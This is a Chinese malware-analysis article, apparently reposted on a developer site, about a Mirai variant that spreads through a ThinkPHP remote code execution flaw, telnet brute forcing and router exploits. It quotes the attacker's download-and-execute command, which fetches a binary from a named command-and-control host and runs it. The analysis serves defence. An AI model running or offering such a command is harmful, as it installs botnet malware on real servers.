内容简介:12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。下图为攻击日志:
*本文原创作者:kczwa1,本文属于FreeBuf原创奖励计划,未经许可禁止转载
一、概述
12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。
下图为攻击日志:
攻击者试图在被攻击服务器上执行如下命令:
‘Cd /tmp;wget http://cnc.junoland.xyz/bins/egg.x86;cat egg.x86> lzrd;chmod 777 lzrd;./lzrd ‘
同时从该恶意文件存放网站上还发现了arm,mips,mipsl等不同cpu架构版本的病毒:
获取egg.x86文件后,截止测试时,根据virustotal网站信息,暂无国内安全公司识别该文件为病毒,如下图所示:
此文件应该是Mirari病毒的一种新变种,保留了传统Mirari特征,试图通过最新的thinkphp漏洞来收割一波服务器肉鸡,比起之前的mirari只攻击IOT设备,这个文件的目标范围扩大了不少。
二、病毒分析
由于体力原因,并未分析完所有的功能。
该病毒为了躲避静态分析,并不直接从库函数libc里面调用系统函数,导入表为空:
所有的系统调用都采用int 80h Linux系统 软中断调用组合系统调用号的方式实现,如下图:
注释后的关键结构代码如下:
包含了漏洞扫描模块和结束模块,代码结构与mirai 类似。
listen_43824模块会打开本地网络监听端口43824:
telnet_brute_force模块,扫描随机IP的telnet服务是否打开,telnet服务在路由器等IOT设备上应用较多,目的IP根据系统时间和进程号进行计算生成:
抓取流量包后发现扫描行为如下:
在进行逆向调试时,成功扫描到某IP开放了23端口telnet服务,从返回信息看该IP为一台华为家用路由器,如下图所示:
当扫描到目的IP开放telnet服务后,开始使用弱口令尝试爆破扫描出的telnet服务。在内存中发现病毒自带的一份弱口令密码表,如图下图所示,这个样本采用少量的密码字典,因为大范围的扫描公网IP字典少扫描效率相对较高,同时由于攻击目标为IOT的Telnet服务,这个服务经常用一些很简单的密码:
Linksys_exp模块会扫描随机IP的8080服务是否打开,目的IP根据系统时间和进程号进行计算生成,如图所示:
下图为通过抓取网络数据发现的对随机IP进行的8080端口扫描行为:
当扫描到IP开放后则使用漏洞CNVD-2014-01260(Linksys多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞)进行攻击,根据payload内容如果此漏洞攻击成功则会在目标路由器上下载egg.mpsl(此病毒的mpsl版本)并执行,攻击payload如下:
攻击流量数据如下:
thinkphp_exp模块,跟前面的进程一样进行任意IP端口扫描,发现端口打开后,尝试使用CNVD-2018-24942(ThinkPHP远程代码执行漏洞)进行攻击:
dir_exp模块,跟前面的进程一样进行任意IP端口扫描, 发现端口打开后,尝试使用CNVD-2013-09199 (DIR-300, DIR-600, DIR-645, DIR-845和DIR-865UPnP SOAP接口接口不正确过滤XML参数,允许远程攻击者利用漏洞注入和执行任意命令)进行攻击:
Watchdog_scan模块,由于IOT设备中经常配置看门狗模块以使机器在出现问题时重启,病毒进程在设备重启后将无法启动,因此子进程5尝试在文件系统中打开名为/dev/watchdog,etc/watchdog等的文件,一旦打开成功则篡改其权限让watchdog失效:
*本文原创作者:kczwa1,本文属于FreeBuf原创奖励计划,未经许可禁止转载
以上所述就是小编给大家介绍的《利用Thinkphp漏洞传播的Mirari新变种分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- GCC 7.3 发布,包含变种 Spectre 漏洞补丁
- LLVM 5.0.2 发布,缓解 Spectre 变种漏洞
- Satan勒索软件出现新变种:利用更多新漏洞
- 警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种
- 警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种
- 攻防最前线:Mirai新变种可利用13个已知漏洞
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
AJAX企业级开发
Davec Johnson、Alexeic White、Andrec Charland / 张祖良、荣浩、高冰 / 人民邮电出版社 / 2008 / 49.00元
本书首先解释了AJAX 为什么在大规模的开发中能有如此广阔的应用前景,接着系统地介绍了当前重要的AJAX 技术和组件。你将看到把数据表、Web 窗体、图表、搜索和过滤连接在一起用于构建AJAX应用程序的框架开发的整个过程;在此基础上,本书给出了已经过证实的AJAX 架构模式,以及来源于实际的.NET 和Java AJAX 应用程序的案例研究。一起来看看 《AJAX企业级开发》 这本书的介绍吧!